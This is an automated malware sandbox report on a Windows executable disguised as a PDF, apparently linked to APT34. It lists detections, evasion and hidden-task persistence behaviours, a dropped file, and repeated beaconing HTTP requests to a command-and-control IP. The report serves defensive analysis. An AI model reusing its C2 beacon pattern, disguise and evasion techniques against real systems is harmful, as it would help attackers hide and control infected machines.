
Windows Analysis Report
Ravateb.pdf.exe

Overview

General Information

Sample name: Ravateb.pdf.exe
Analysis ID: 1636359
MD5: e7d52ef521b8cd0b405575c185d64033
SHA1: 6bb4414d717a290b80cca32655b7198f0c832add
SHA256: b607d60d680f1f1335902a666df843ac9cc58299af6731d2ad1a5ea617cf4a99
Tags: APT34, exe, user-smica83

Detection

Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
.NET source code contains suspicious base64 encoded strings
.NET source code contains very large strings
Initial sample is a PE file and has a suspicious name
Joe Sandbox ML detected suspicious sample
Uses an obfuscated file name to hide its real file extension (double extension)
Uses known network protocols on non-standard ports
Yara detected PersistenceViaHiddenTask
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Ravateb.pdf.exe (PID: 7532 cmdline: "C:\Users\user\Desktop\Ravateb.pdf.exe" MD5: E7D52EF521B8CD0B405575C185D64033)
  • windowsObject.exe (PID: 7368 cmdline: C:\users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -time 6.9.2018 MD5: 2BC1C670A5C179E58F6C33C7469B9D98)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000000.00000002.1371627977.0000000000ED6000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PersistenceViaHiddenTask | Yara detected PersistenceViaHiddenTask | Joe Security |
00000000.00000002.1374305706.000000001BE34000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PersistenceViaHiddenTask | Yara detected PersistenceViaHiddenTask | Joe Security |
00000000.00000002.1374192389.000000001BDEE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PersistenceViaHiddenTask | Yara detected PersistenceViaHiddenTask | Joe Security |
Process Memory Space: Ravateb.pdf.exe PID: 7532 | JoeSecurity_PersistenceViaHiddenTask | Yara detected PersistenceViaHiddenTask | Joe Security |

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\Ravateb.pdf.exe", CommandLine: "C:\Users\user\Desktop\Ravateb.pdf.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\Ravateb.pdf.exe, NewProcessName: C:\Users\user\Desktop\Ravateb.pdf.exe, OriginalFileName: C:\Users\user\Desktop\Ravateb.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: "C:\Users\user\Desktop\Ravateb.pdf.exe", ProcessId: 7532, ProcessName: Ravateb.pdf.exe
No Suricata rule has matched


AV Detection

Source: Ravateb.pdf.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe | Avira: detection malicious, Label: TR/Drop.Agent.uvdrx
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe | ReversingLabs: Detection: 45%
Source: Ravateb.pdf.exe | ReversingLabs: Detection: 52%
Source: Ravateb.pdf.exe | Virustotal: Detection: 56%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Ravateb.pdf.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Ravateb.pdf.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\Desktop\Ravateb.pdf.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\Desktop\Ravateb.pdf.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\Desktop\Ravateb.pdf.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\Desktop\Ravateb.pdf.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\Desktop\Ravateb.pdf.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\Desktop\Ravateb.pdf.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\Desktop\Ravateb.pdf.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\Desktop\Ravateb.pdf.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\LocalServer32
Source: C:\Users\user\Desktop\Ravateb.pdf.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\LocalServer32
Source: C:\Users\user\Desktop\Ravateb.pdf.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\LocalServer32
Source: C:\Users\user\Desktop\Ravateb.pdf.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\LocalServer32
Source: C:\Users\user\Desktop\Ravateb.pdf.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\LocalServer32
Source: C:\Users\user\Desktop\Ravateb.pdf.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\LocalServer32
Source: C:\Users\user\Desktop\Ravateb.pdf.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\Desktop\Ravateb.pdf.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\Desktop\Ravateb.pdf.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\Desktop\Ravateb.pdf.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\Desktop\Ravateb.pdf.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\Desktop\Ravateb.pdf.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\Desktop\Ravateb.pdf.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\Desktop\Ravateb.pdf.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\Desktop\Ravateb.pdf.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\Desktop\Ravateb.pdf.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\Desktop\Ravateb.pdf.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\Desktop\Ravateb.pdf.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\Desktop\Ravateb.pdf.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\Desktop\Ravateb.pdf.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\Desktop\Ravateb.pdf.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\Desktop\Ravateb.pdf.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs

Networking

Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 10443
Source: unknown | Network traffic detected: HTTP traffic on port 10443 -> 49721
Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 10443
Source: unknown | Network traffic detected: HTTP traffic on port 10443 -> 49722
Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 10443
Source: unknown | Network traffic detected: HTTP traffic on port 10443 -> 49723
Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 10443
Source: unknown | Network traffic detected: HTTP traffic on port 10443 -> 49724
Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 10443
Source: unknown | Network traffic detected: HTTP traffic on port 10443 -> 49726
Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 10443
Source: unknown | Network traffic detected: HTTP traffic on port 10443 -> 49727
Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 10443
Source: unknown | Network traffic detected: HTTP traffic on port 10443 -> 49728
Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 10443
Source: unknown | Network traffic detected: HTTP traffic on port 10443 -> 49729
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 10443
Source: unknown | Network traffic detected: HTTP traffic on port 10443 -> 49730
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 10443
Source: unknown | Network traffic detected: HTTP traffic on port 10443 -> 49731
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 10443
Source: unknown | Network traffic detected: HTTP traffic on port 10443 -> 49732
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 10443
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 10443
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 10443
Source: unknown | Network traffic detected: HTTP traffic on port 10443 -> 49733
Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 10443
Source: unknown | Network traffic detected: HTTP traffic on port 10443 -> 49734
Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 10443
Source: unknown | Network traffic detected: HTTP traffic on port 10443 -> 49735
Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 10443
Source: unknown | Network traffic detected: HTTP traffic on port 10443 -> 49736
Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 10443
Source: unknown | Network traffic detected: HTTP traffic on port 10443 -> 49737
Source: global traffic | TCP traffic: 192.168.2.4:49721 -> 89.46.233.239:10443
Source: global traffic | HTTP traffic detected: GET /resource HTTP/1.1 | Host: 89.46.233.239 | Host: Connection: keep-alive | Upgrade-Insecure-Requests: 1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Encoding: gzip, deflate | Accept-Language: en-US,en;q=0.9 | Authorization: Bearer SLFDCoiLjGhLcClIKQVYFAFNVW0oDBQJTSkJEExQQ
Source: global traffic | HTTP traffic detected: GET /resource HTTP/1.1 | Host: 89.46.233.239 | Host: Connection: keep-alive | Upgrade-Insecure-Requests: 1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Encoding: gzip, deflate | Accept-Language: en-US,en;q=0.9 | Authorization: Bearer XLJFCoiLjWhLcClHKQVYFAFNVW0oDBQJTSkJEExQQ
Source: global traffic | HTTP traffic detected: GET /resource HTTP/1.1 | Host: 89.46.233.239 | Host: Connection: keep-alive | Upgrade-Insecure-Requests: 1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Encoding: gzip, deflate | Accept-Language: en-US,en;q=0.9 | Authorization: Bearer SLTGCoiLjGhLcClIKQVYFAFNVW0oDBQJTSkJEExQQ
Source: global traffic | HTTP traffic detected: GET /resource HTTP/1.1 | Host: 89.46.233.239 | Host: Connection: keep-alive | Upgrade-Insecure-Requests: 1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Encoding: gzip, deflate | Accept-Language: en-US,en;q=0.9 | Authorization: Bearer OLSPCoiLjThLcClBKQVYFAFNVW0oDBQJTSkJEExQQ
Source: global traffic | HTTP traffic detected: GET /resource HTTP/1.1 | Host: 89.46.233.239 | Host: Connection: keep-alive | Upgrade-Insecure-Requests: 1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Encoding: gzip, deflate | Accept-Language: en-US,en;q=0.9 | Authorization: Bearer RLNCCoiLjLhLcClGKQVYFAFNVW0oDBQJTSkJEExQQ
Source: global traffic | HTTP traffic detected: GET /resource HTTP/1.1 | Host: 89.46.233.239 | Host: Connection: keep-alive | Upgrade-Insecure-Requests: 1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Encoding: gzip, deflate | Accept-Language: en-US,en;q=0.9 | Authorization: Bearer MLCNCoiLjJhLcClVKQVYFAFNVW0oDBQJTSkJEExQQ
Source: global traffic | HTTP traffic detected: GET /resource HTTP/1.1 | Host: 89.46.233.239 | Host: Connection: keep-alive | Upgrade-Insecure-Requests: 1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Encoding: gzip, deflate | Accept-Language: en-US,en;q=0.9 | Authorization: Bearer MLLQCoiLjChLcClBKQVYFAFNVW0oDBQJTSkJEExQQ
Source: global traffic | HTTP traffic detected: GET /resource HTTP/1.1 | Host: 89.46.233.239 | Host: Connection: keep-alive | Upgrade-Insecure-Requests: 1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Encoding: gzip, deflate | Accept-Language: en-US,en;q=0.9 | Authorization: Bearer FLCLCoiLjThLcClYKQVYFAFNVW0oDBQJTSkJEExQQ
Source: global traffic | HTTP traffic detected: GET /resource HTTP/1.1 | Host: 89.46.233.239 | Host: Connection: keep-alive | Upgrade-Insecure-Requests: 1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Encoding: gzip, deflate | Accept-Language: en-US,en;q=0.9 | Authorization: Bearer MLHZCoiLjGhLcClIKQVYFAFNVW0oDBQJTSkJEExQQ
Source: global traffic | HTTP traffic detected: GET /resource HTTP/1.1 | Host: 89.46.233.239 | Host: Connection: keep-alive | Upgrade-Insecure-Requests: 1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Encoding: gzip, deflate | Accept-Language: en-US,en;q=0.9 | Authorization: Bearer ILKGCoiLjVhLcClFKQVYFAFNVW0oDBQJTSkJEExQQ
Source: global traffic | HTTP traffic detected: GET /resource HTTP/1.1 | Host: 89.46.233.239 | Host: Connection: keep-alive | Upgrade-Insecure-Requests: 1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Encoding: gzip, deflate | Accept-Language: en-US,en;q=0.9 | Authorization: Bearer ELVHCoiLjVhLcClSKQVYFAFNVW0oDBQJTSkJEExQQ
Source: global traffic | HTTP traffic detected: GET /resource HTTP/1.1 | Host: 89.46.233.239 | Host: Connection: keep-alive | Upgrade-Insecure-Requests: 1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Encoding: gzip, deflate | Accept-Language: en-US,en;q=0.9 | Authorization: Bearer ULGLCoiLjEhLcClOKQVYFAFNVW0oDBQJTSkJEExQQ
Source: global traffic | HTTP traffic detected: GET /resource HTTP/1.1 | Host: 89.46.233.239 | Host: Connection: keep-alive | Upgrade-Insecure-Requests: 1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Encoding: gzip, deflate | Accept-Language: en-US,en;q=0.9 | Authorization: Bearer ULGLCoiLjEhLcClOKQVYFAFNVW0oDBQJTSkJEExQQ
Source: global traffic | HTTP traffic detected: GET /resource HTTP/1.1 | Host: 89.46.233.239 | Host: Connection: keep-alive | Upgrade-Insecure-Requests: 1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Encoding: gzip, deflate | Accept-Language: en-US,en;q=0.9 | Authorization: Bearer ULGLCoiLjEhLcClOKQVYFAFNVW0oDBQJTSkJEExQQ
Source: global traffic | HTTP traffic detected: GET /resource HTTP/1.1 | Host: 89.46.233.239 | Host: Connection: keep-alive | Upgrade-Insecure-Requests: 1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Encoding: gzip, deflate | Accept-Language: en-US,en;q=0.9 | Authorization: Bearer ZLYPCoiLjZhLcClVKQVYFAFNVW0oDBQJTSkJEExQQ
Source: global traffic | HTTP traffic detected: GET /resource HTTP/1.1 | Host: 89.46.233.239 | Host: Connection: keep-alive | Upgrade-Insecure-Requests: 1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Encoding: gzip, deflate | Accept-Language: en-US,en;q=0.9 | Authorization: Bearer QLJXCoiLjMhLcClEKQVYFAFNVW0oDBQJTSkJEExQQ
Source: global traffic | HTTP traffic detected: GET /resource HTTP/1.1 | Host: 89.46.233.239 | Host: Connection: keep-alive | Upgrade-Insecure-Requests: 1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Encoding: gzip, deflate | Accept-Language: en-US,en;q=0.9 | Authorization: Bearer ELJNCoiLjYhLcClXKQVYFAFNVW0oDBQJTSkJEExQQ
Source: global traffic | HTTP traffic detected: GET /resource HTTP/1.1 | Host: 89.46.233.239 | Host: Connection: keep-alive | Upgrade-Insecure-Requests: 1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Encoding: gzip, deflate | Accept-Language: en-US,en;q=0.9 | Authorization: Bearer RLHGCoiLjZhLcClOKQVYFAFNVW0oDBQJTSkJEExQQ
Source: unknown | TCP traffic detected without corresponding DNS query: 89.46.233.239 (this entry appears 50 times in the report)
          Source: global trafficHTTP traffic detected: GET /resource HTTP/1.1Host: 89.46.233.239Host: Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Authorization: Bearer ULGLCoiLjEhLcClOKQVYFAFNVW0oDBQJTSkJEExQQ
          Source: global trafficHTTP traffic detected: GET /resource HTTP/1.1Host: 89.46.233.239Host: Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Authorization: Bearer ULGLCoiLjEhLcClOKQVYFAFNVW0oDBQJTSkJEExQQ
          Source: global trafficHTTP traffic detected: GET /resource HTTP/1.1Host: 89.46.233.239Host: Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Authorization: Bearer ZLYPCoiLjZhLcClVKQVYFAFNVW0oDBQJTSkJEExQQ
          Source: global trafficHTTP traffic detected: GET /resource HTTP/1.1Host: 89.46.233.239Host: Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Authorization: Bearer QLJXCoiLjMhLcClEKQVYFAFNVW0oDBQJTSkJEExQQ
          Source: global trafficHTTP traffic detected: GET /resource HTTP/1.1Host: 89.46.233.239Host: Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Authorization: Bearer ELJNCoiLjYhLcClXKQVYFAFNVW0oDBQJTSkJEExQQ
          Source: global trafficHTTP traffic detected: GET /resource HTTP/1.1Host: 89.46.233.239Host: Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Authorization: Bearer RLHGCoiLjZhLcClOKQVYFAFNVW0oDBQJTSkJEExQQ

          System Summary

Source: Ravateb.pdf.exe, Class1.cs -- Base64 encoded string: System.Net
Source: Ravateb.pdf.exe, Class1.cs -- Long String: Length: 29361
Source: initial sample -- Static PE information: Filename: Ravateb.pdf.exe
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Code function: 0_2_00007FFC3DDA4DE6
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Code function: 0_2_00007FFC3DDA6595
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Code function: 0_2_00007FFC3DDA091D
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Code function: 0_2_00007FFC3DDB1CA1
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Code function: 0_2_00007FFC3DDA5B92
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Code function: 0_2_00007FFC3DDA7D7F
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Code function: 0_2_00007FFC3DDA6D3E
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Code function: 0_2_00007FFC3DDA0AF7
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Code function: 0_2_00007FFC3DDA0AC1
Source: C:\Users\user\Desktop\Ravateb.pdf.exe -- Code function: 0_2_00007FFC3DE80DDE
Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -- Code function: 8_2_00007FFC3DE41508
